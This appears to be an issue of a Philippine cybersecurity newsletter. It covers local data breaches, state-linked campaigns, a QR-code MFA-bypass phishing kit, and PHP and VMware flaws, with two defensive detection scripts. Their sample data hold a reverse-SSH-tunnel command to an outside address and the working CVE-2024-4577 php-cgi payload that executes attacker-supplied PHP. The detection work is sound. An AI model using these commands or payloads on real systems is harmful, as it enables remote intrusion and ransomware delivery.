CyberSecurity.PH #024

Maxicare patient data breach; MARINA data breaches; Dutch intelligence on Chinese FortiGate hacks; Phishing-as-a-service delivering MFA bypass; Rapid weaponization of new PHP vulnerability; VMware RCE vulnerability; Cloudsploit a cloud configuration scanner

Hi, we have plenty of free online resources too! High quality cybersecurity learning materials, local education providers, loads of cybersecurity tools, plenty of policy templates to get you started, information on local conferences, relevant cybersecurity strategy papers and information on local cyber crime reporting.

CyberSecurity.PH is working hard to help improve cybersecurity outcomes in the Philippines by providing free cybersecurity reports that matter; up-to-date cyber threat landscape reports; and serious security-engineering highlights.

Tell your friends and subscribe to improve your cybersecurity capacity.


Philippines

Maxicare patient booking data breach via external provider Lab@Home

The Philippine National Privacy Commission (NPC) has stated it has received notification of a data breach event from Maxicare Healthcare Corporation over the weekend.

The patient booking data of approximately 13,000 members is understood to have leaked via the third-party provider “Lab@Home” and includes: full name, employer identification data, Maxicare card number, date of birth, sex, contact phone numbers and email address.

A statement from Maxicare indicates the third-party “Lab@Home” systems do not integrate directly with Maxicare internal systems.

Further reading: Rappler, Inquirer, Manila Times, Kukublan Philippines

Philippine Maritime Industry Authority (MARINA) data breaches expose maritime vessel information

The Philippine Maritime Industry Authority (MARINA) has confirmed a cyberattack has compromised at least 4 of its online processing systems.

According to information posted by Kukublan Philippines the systems involved include: Authority to Accept Payment (ATAP), Accomplishment Report Management System (ARMS), Integrated Domestic Shipping Information System (IDSIS), and the SRB/SID Expedite Application System.

Reporting on this incident by the Philippine News Agency (PNA) indicates that MARINA does not believe seafarers’ data has been compromised; however, the screenshots in the Kukublan post appear to show database schemas that would indicate otherwise.

Further reading: PhilStar Global, ABS-CBN, Rappler


Cybersecurity Threat Landscape

Dutch intelligence: Chinese hacking campaign of FortiGate devices more extensive than previously known

The Dutch military intelligence and security service (MIVD) has issued an alert that describes a Chinese cyber-espionage campaign exploiting a vulnerability in FortiGate devices for at least two months before Fortinet announced or patched the vulnerability.

The vulnerability, tracked as CVE-2022-42475 (CVSS 9.8), was exploited during this “zero-day” period to compromise 14,000 devices, with targets including dozens of Western governments, international organizations and a large number of companies within the defence industry.

The Dutch MIVD investigated the campaign after discovering that the threat actor had deployed a remote access trojan (named “COATHANGER”) on a FortiGate device in a Dutch defence network, which enabled the exfiltration of user account data from an Active Directory server operated by the Dutch defence forces.

Further reading: Cyberscoop, Bleeping Computer, The Register, The Record

Indonesia and United States hold joint maritime port cybersecurity exercises

The United States and Indonesia have recently (June 10-13) completed maritime port cybersecurity simulation exercises to learn from and prepare for attacks on critical Indonesian port infrastructure.

The exercise enabled cybersecurity officials to develop response capabilities through a series of simulations, including incidents affecting ship-to-shore cranes and ransomware attacks that disabled critical systems and exfiltrated proprietary and personal information.

Indonesian public and private sector participants were involved in the exercises.

Further reading: DHS.gov, The Record

ONNX phishing service delivers MFA bypass on Microsoft 365 accounts

Cybersecurity company “EclecticIQ” has posted an article detailing a phishing-as-a-service provider named “ONNX” that they believe is a re-branding of the “Caffeine” phishing kit that surfaced in 2022.

Of particular note are the techniques used to put victims in a position where their MFA codes can be intercepted. In short, threat actors send victims a PDF containing a QR code that encodes a URL; scanning it takes the user to a look-alike Microsoft 365 login page served by the phishing kit. The narrative, delivery and content of the PDFs are convincing to many users.

This technique is effective and shows threat actors learning what works. Embedding the URL in a QR code keeps the link out of the email body and out of any text the attachment scanner extracts, so email-scanning systems that do not render and decode QR-code images never see the target URL; the victim then typically completes the journey on a personal phone, outside corporate web filtering.

Further reading: Dark Reading, Bleeping Computer

Chinese “Velvet Ant” threat actors targeting F5 devices in years-long campaign

Cybersecurity company Sygnia has posted a lengthy and in-depth analysis of observed activity from the threat actor known as “Velvet Ant”, assessed to be a China-nexus state-sponsored group.

In particular, the article describes a round of cat-and-mouse with the threat actor to remove them from the victim network that ultimately led to the discovery of their persistence on compromised F5 BIG-IP appliances, from which they maintained a reverse SSH tunnel back to their infrastructure.

The post from Sygnia is an excellent read with up-to-date and real-world learnings for cyber threat responders.
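As an added example (not code from Sygnia or F5) of how a responder might hunt for the reverse-SSH-tunnel persistence described above, the script below parses `ps -eo pid,user,args` output from a Linux-based appliance and reports every ssh client process that sets up a remote forward, SOCKS proxy or tun device. It assumes the internal address ranges listed in INTERNAL_NETS (an assumption to adjust to your own asset inventory) and treats host names it cannot parse as IP literals as “unknown”; the process list is constructed for illustration.

```python
# Added example: hunt a process list for ssh clients configured as reverse tunnels.
# Assumptions (not from the Sygnia post): input is `ps -eo pid,user,args` text and
# INTERNAL_NETS describes the organisation's own address space. SAMPLE_PS is constructed.
import ipaddress
import shlex
from typing import Dict, List, Optional, Set, Tuple

# ssh(1) single-letter options that consume a value; every other letter is a bare flag
OPTS_WITH_ARG = set("bBcDEeFIiJLlmOopQRSWw")
# forwarding options that hand a remote party a path back into the network
TUNNEL_OPTS = {"R": "remote-forward", "D": "socks-proxy", "w": "tun-device"}
# assumed internal ranges; replace with the real asset inventory
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def parse_ssh_argv(argv: List[str]) -> Tuple[Set[str], List[Tuple[str, str]], Optional[str]]:
    """Split an ssh command line into bare flags, tunnel specs and the destination."""
    flags: Set[str] = set()
    tunnels: List[Tuple[str, str]] = []
    dest: Optional[str] = None
    i = 1
    while i < len(argv):
        tok = argv[i]
        if tok.startswith("-") and len(tok) > 1:
            letters = tok[1:]
            for j, ch in enumerate(letters):
                if ch in OPTS_WITH_ARG:
                    value = letters[j + 1:]            # "-R8080:..." form
                    if not value:                      # "-R 8080:..." form
                        i += 1
                        value = argv[i] if i < len(argv) else ""
                    if ch in TUNNEL_OPTS:
                        tunnels.append((TUNNEL_OPTS[ch], value))
                    break
                flags.add(ch)                          # e.g. "-fN" -> {"f", "N"}
        elif dest is None:
            dest = tok                                 # first non-option word: [user@]host
        i += 1
    return flags, tunnels, dest


def destination_is_external(dest: Optional[str]) -> Optional[bool]:
    """True/False for IP literals, None for host names (needs a DNS or asset lookup)."""
    if dest is None:
        return None
    host = dest.rsplit("@", 1)[-1].strip("[]")
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return None
    return not any(ip in net for net in INTERNAL_NETS)


def find_reverse_tunnels(ps_text: str) -> List[Dict[str, object]]:
    """Return one finding per ssh client process that establishes a tunnel."""
    findings: List[Dict[str, object]] = []
    for line in ps_text.splitlines()[1:]:            # skip the ps header row
        fields = line.split(None, 2)
        if len(fields) < 3:
            continue
        pid, user, cmd = fields
        argv = shlex.split(cmd)
        if not argv or argv[0].rsplit("/", 1)[-1] != "ssh":
            continue                                   # sshd, scp, etc. are out of scope
        flags, tunnels, dest = parse_ssh_argv(argv)
        if not tunnels:
            continue
        findings.append({
            "pid": int(pid), "user": user, "dest": dest, "tunnels": tunnels,
            "external": destination_is_external(dest),
            "background": bool(flags & {"f", "N"}),    # no shell, daemonised: tunnel-only use
        })
    return findings


# Constructed `ps -eo pid,user,args` output from a hypothetical appliance
SAMPLE_PS = """\
  PID USER     COMMAND
 1234 root     /usr/bin/ssh -o StrictHostKeyChecking=no -fN -R 0.0.0.0:2222:127.0.0.1:22 ops@203.0.113.50 -p 443
  987 admin    sshd: admin [priv]
 4521 root     /usr/bin/ssh -L 8080:10.0.0.5:80 jump.internal
 5001 root     /usr/bin/ssh -N -R 9000:localhost:22 backup@10.1.2.3
"""

if __name__ == "__main__":
    for finding in find_reverse_tunnels(SAMPLE_PS):
        print(finding)
```

Run it against a saved `ps` capture from each appliance rather than on the appliance itself where possible; a process list is cheap to collect and the same parser works for any Linux host. A finding with an external destination, a remote forward and the background flags set is the shape of tunnel the article describes and warrants checking the device's ssh configuration and outbound connections immediately.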

Further reading: Hack Read, Cybersecurity News, Bleeping Computer

Tough week to be a user of Microsoft technologies

Users of Microsoft technologies and products are having a terrible time recently if they have an expectation of cybersecurity.

  • US Congress seeks answers from Microsoft boss after a “Cascade” of security errors putting governments at risk - Washington Post
  • New Windows Wi-Fi takeover attack - All Windows users warned to update now - Forbes.com, The Register
  • CISA warns of Windows bug (CVE-2024-26169) actively exploited in Black Basta ransomware attacks - Bleeping Computer
  • Microsoft Postpones Windows Recall After Major Backlash - Windows Central / Microsoft has lost trust with its users - Windows Central
  • Ex-Microsoft employee: Microsoft chose profit over security and left the U.S. Government vulnerable to Russian hack - ProPublica

It is certainly tough to manage a threat landscape as large as the one Microsoft is ultimately responsible for.


Cybersecurity Tools and Engineering

A weekly highlight on tools and other resources (often open-source) that we use, find useful or are just plain interesting; check out the engineering section online at CyberSecurity.PH too!


Cybersecurity Vulnerabilities

Threat actors rapidly weaponize recent PHP vulnerability for ransomware activity

Cybersecurity company Censys has posted details of ransomware activity by the TellYouThePass ransomware group targeting web servers that run PHP on Windows.

The recent PHP vulnerability CVE-2024-4577 (CVSS 9.8) is an argument-injection flaw in PHP on Windows. It requires PHP to be running in CGI mode (php-cgi, which XAMPP for Windows exposes by default) with the system locale set to Chinese (Simplified or Traditional) or Japanese: in those code pages Windows applies a “best-fit” character conversion that turns the soft-hyphen byte 0xAD into an ordinary hyphen, so a query string containing %AD slips past the protection added for the 2012 php-cgi bug (CVE-2012-1823) and is then interpreted by php-cgi as command-line switches such as -d. This explains why many Chinese-language sites have been observed as impacted. Fixes are in PHP 8.3.8, 8.2.20 and 8.1.29; older branches are end-of-life and remain vulnerable.
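To make the mechanism concrete, here is an added example (not code from Censys or the PHP project) that scans Apache-style access log lines for php-cgi argument-injection probes. It models the best-fit conversion described above as a byte replacement of 0xAD with '-', and assumes the log stores the request line as received (still percent-encoded) and that the server follows the CGI convention of passing a query string with no unencoded '=' to the script as command-line arguments split on '+'. The log lines are constructed.

```python
# Added example: flag CVE-2024-4577-style php-cgi argument-injection probes in access logs.
# Assumptions (not from the Censys post): request lines are logged still percent-encoded,
# and a '='-free query string reaches php-cgi as argv split on '+'. SAMPLE_LOG is constructed.
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_to_bytes

# php-cgi switches worth flagging when they arrive via the query string:
# -d (override an ini directive), -s (dump source), -n (ignore php.ini), -c (ini path)
PHP_CGI_SWITCHES = {"d", "s", "n", "c"}

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)


def best_fit(raw: bytes) -> bytes:
    """Model the Windows best-fit conversion in code pages 932/936/950 that turns the
    soft-hyphen byte 0xAD into an ordinary hyphen before php-cgi's option parser sees argv."""
    return raw.replace(b"\xad", b"-")


def classify_query(query_string: str) -> Optional[str]:
    """Return a label if the query string would reach php-cgi as a dangerous switch."""
    if "=" in query_string:            # an unencoded '=' means ordinary parameters, not argv
        return None
    for part in query_string.split("+"):
        raw = unquote_to_bytes(part)
        arg = best_fit(raw)
        if len(arg) >= 2 and arg[:1] == b"-" and chr(arg[1]) in PHP_CGI_SWITCHES:
            # 0xAD present: the '-' only exists after best-fit, i.e. the 2024 bypass;
            # a literal '-' is the older CVE-2012-1823 pattern that patched php-cgi rejects
            return "cve-2024-4577" if b"\xad" in raw else "php-cgi-argv-injection"
    return None


def injected_ini_settings(query_string: str) -> List[str]:
    """Collect the ini directives an attacker is trying to set with -d."""
    if "=" in query_string:
        return []
    args = [best_fit(unquote_to_bytes(p)) for p in query_string.split("+") if p]
    settings: List[str] = []
    i = 0
    while i < len(args):
        if args[i].startswith(b"-d"):
            if len(args[i]) > 2:                 # -dname=value
                settings.append(args[i][2:].decode("latin-1"))
            elif i + 1 < len(args):              # -d name=value
                i += 1
                settings.append(args[i].decode("latin-1"))
        i += 1
    return settings


def scan_log(log_text: str) -> List[Dict[str, object]]:
    """Return one hit per request whose query string carries php-cgi switches."""
    hits: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m or "?" not in m.group("target"):
            continue
        query = m.group("target").split("?", 1)[1]
        label = classify_query(query)
        if label:
            hits.append({"ip": m.group("ip"), "label": label,
                         "ini": injected_ini_settings(query)})
    return hits


# Constructed sample: one 2024-style probe using the soft hyphen, one benign request,
# and one classic literal-hyphen probe that a patched php-cgi already rejects.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Jun/2024:01:22:13 +0000] "POST /php-cgi/php-cgi.exe?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.4 - - [10/Jun/2024:01:23:45 +0000] "GET /index.php?page=about HTTP/1.1" 200 3311 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Jun/2024:01:25:02 +0000] "GET /cgi-bin/php?-d+allow_url_include%3d1 HTTP/1.1" 403 199 "-" "curl/8.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The pair of directives in the first sample line (allow_url_include plus auto_prepend_file=php://input) is the classic php-cgi payload: it makes php-cgi execute whatever PHP code is in the POST body, which is how a ransomware dropper gets onto the host in one request. Where upgrading is not immediately possible, the PHP release announcement suggests an Apache rewrite rule that rejects query strings beginning with %ad as a stop-gap; the scanner above is the matching detection for hosts that were exposed before that rule or the patch went in.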

Further reading: Bleeping Computer, Ars Technica

VMware fixes critical vCenter remote-code-execution vulnerability, patch now

VMware has patched three new vulnerabilities impacting its vCenter Server product.

  • CVE-2024-37079 and CVE-2024-37080 - heap-overflow vulnerabilities in vCenter Server's implementation of the DCERPC protocol that allow a threat actor with network access to send specially crafted packets and achieve remote code execution - both with a CVSS of 9.8
  • CVE-2024-37081 - a misconfiguration of sudo in vCenter Server that permits an authenticated local user with non-administrative privileges to escalate to root - CVSS of 7.8

Further Reading: The Register, Bleeping Computer, Dark Reading


Got news or something you’d like us to mention, feel free to get in contact - [email protected]

Subscribe to CyberSecurity.PH

Subscribe to receive our latest updates as they get released.